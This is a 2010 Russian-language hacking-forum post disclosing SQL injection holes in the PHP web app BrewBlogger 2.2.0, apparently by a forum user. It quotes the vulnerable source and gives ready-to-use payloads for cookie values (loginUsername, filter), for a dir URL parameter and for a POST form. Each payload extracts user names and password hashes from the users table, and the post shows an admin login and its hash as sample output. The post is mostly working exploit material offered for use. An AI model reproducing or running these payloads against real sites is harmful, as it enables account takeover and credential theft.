Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
21.04.2010, 02:44
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
brewblogger 2.2.0
Blind SQL inj
index.php
PHP код:
require_once ('Connections/config.php');
require ('includes/authentication_nav.inc.php'); session_start();
include ('includes/db_connect_universal.inc.php');...
/includes/authentication_nav.inc.php
PHP код:
mysql_select_db($database_brewing, $brewing);
$query_user = sprintf("SELECT * FROM users WHERE user_name = '%s'", $loginUsername);
$user = mysql_query($query_user, $brewing) or die(mysql_error());
$row_user = mysql_fetch_assoc($user);
$totalRows_user = mysql_num_rows($user);...
/includes/db_connect_universal.inc.php
PHP код:
// Get server's PHP version
$phpVersion = phpversion();
//echo $phpVersion;
$currentPage = "http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
if (!empty($_SERVER["QUERY_STRING"])) $currentPage .= "?".$_SERVER['QUERY_STRING'];
$loginUsername = $_SESSION["loginUsername"];
target:index.php
Условие:
rg=on;
mg=off.
Опять в куки, например, тулим:
; loginUsername=h' and (select 1 from (select count(0),concat(version(),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a)#
Пароли и логины в таблице users:
user_name password
Рабочий запрос (проверил на 5.1.40-community):
; loginUsername=h' and (select 1 from (select count(0),concat_ws(0x3a,(select user_name from users limit 0,1),(select password from users limit 0,1),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a)#
Blind SQL inj
/includes/db_connect_universal.inc.php
PHP код:
// User Info
mysql_select_db($database_brewing, $brewing);
$query_user5 = sprintf("SELECT * FROM users WHERE user_name = '%s'", $filter);
$user5 = mysql_query($query_user5, $brewing) or die(mysql_error());
$row_user5 = mysql_fetch_assoc($user5);
$totalRows_user5 = mysql_num_rows($user5);...
need:
rg=on;
mg=off
target:index.php
Result:
в куки, напр.:
; filter=h' and (select 1 from (select count(0),concat_ws(0x3a,(select user_name from users limit 0,1),(select password from users limit 0,1),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a)#
blind SQL inj (в order by)
includes/db_connect_universal.inc.php
PHP код:
...
if ($page == "brewBlogList") {
if ($filter == "all") {
mysql_select_db($database_brewing, $brewing);
$query_log = sprintf("SELECT * FROM brewing ORDER BY %s %s", $sort, $dir);
$log = mysql_query($query_log, $brewing) or die(mysql_error());
$row_log = mysql_fetch_assoc($log);
$totalRows_log = mysql_num_rows($log);
}...
PHP код:
...if ($page == "brewBlogList") $dir = "DESC";
else $dir = "ASC";
if (isset($_GET['dir'])) {
$dir = (get_magic_quotes_gpc()) ? $_GET['dir'] : addslashes($_GET['dir']);...
PHP код:
...$page = $row_pref['home'];
if (isset($_GET['page'])) {
$page = (get_magic_quotes_gpc()) ? $_GET['page'] : addslashes($_GET['page']);
}...
PHP код:
...elseif ($page == "brewBlogList") $sort = "brewDate";...
need only:
rg=on 
Reslult:
http://localhost/brewblogger2.2.0/index.php?page=brewBlogList&dir=[SQL]
http://localhost/brewblogger2.2.0/index.php?page=brewBlogList&dir=,%28select%201%20f rom%20%28select%20count%280%29,concat_ws%280x3a,%2 8select%20user_name%20from%20users%20limit%200,1%2 9,%28select%20password%20from%20users%20limit%200, 1%29,floor%28rand%280%29*2%29%29%20from%20%28selec t%201%20union%20select%202%20union%20select%203%29 x%20group%20by%202%29a%29#
Duplicate entry 'admin:21232f297a57a5a743894a0e4a801fc3:1' for key 'group_key'
Крутил как блинд, походу принтабельных нет(кажысь)!
Дальше по тексту есть иньекции при rg=on!
SQL inj
УРЯ!
Поиск принтабельной скули закнончился успехом!
target: our_site/sections/entry.inc.php?action=hack
/sections/entry.inc.php
Вот куски:
PHP код:
...if ($action == "default") {
$style = "default";
if (isset($_GET['style'])) {
$style = (get_magic_quotes_gpc()) ? $_GET['style'] : addslashes($_GET['style']);
}
} else
$style = $_POST['style'];...
PHP код:
...mysql_select_db($database_brewing, $brewing);
$query_style1 = sprintf("SELECT * FROM styles WHERE brewStyle = '%s'", $style);
$style1 = mysql_query($query_style1, $brewing) or die(mysql_error());
$row_style1 = mysql_fetch_assoc($style1);
$totalRows_style1 = mysql_num_rows($style1);...
need:
mg=off
Result:
<form action="http://localhost/brewblogger2.2.0/sections/entry.inc.php?action=hack" method="post">
<input type="text" name="style" value="' union select 1,user_name,password,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17 from users-- ">
<input type=submit value="ok">
</form>
ps
иследовал не полностю!
Последний раз редактировалось Strilo4ka; 21.04.2010 в 03:09..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид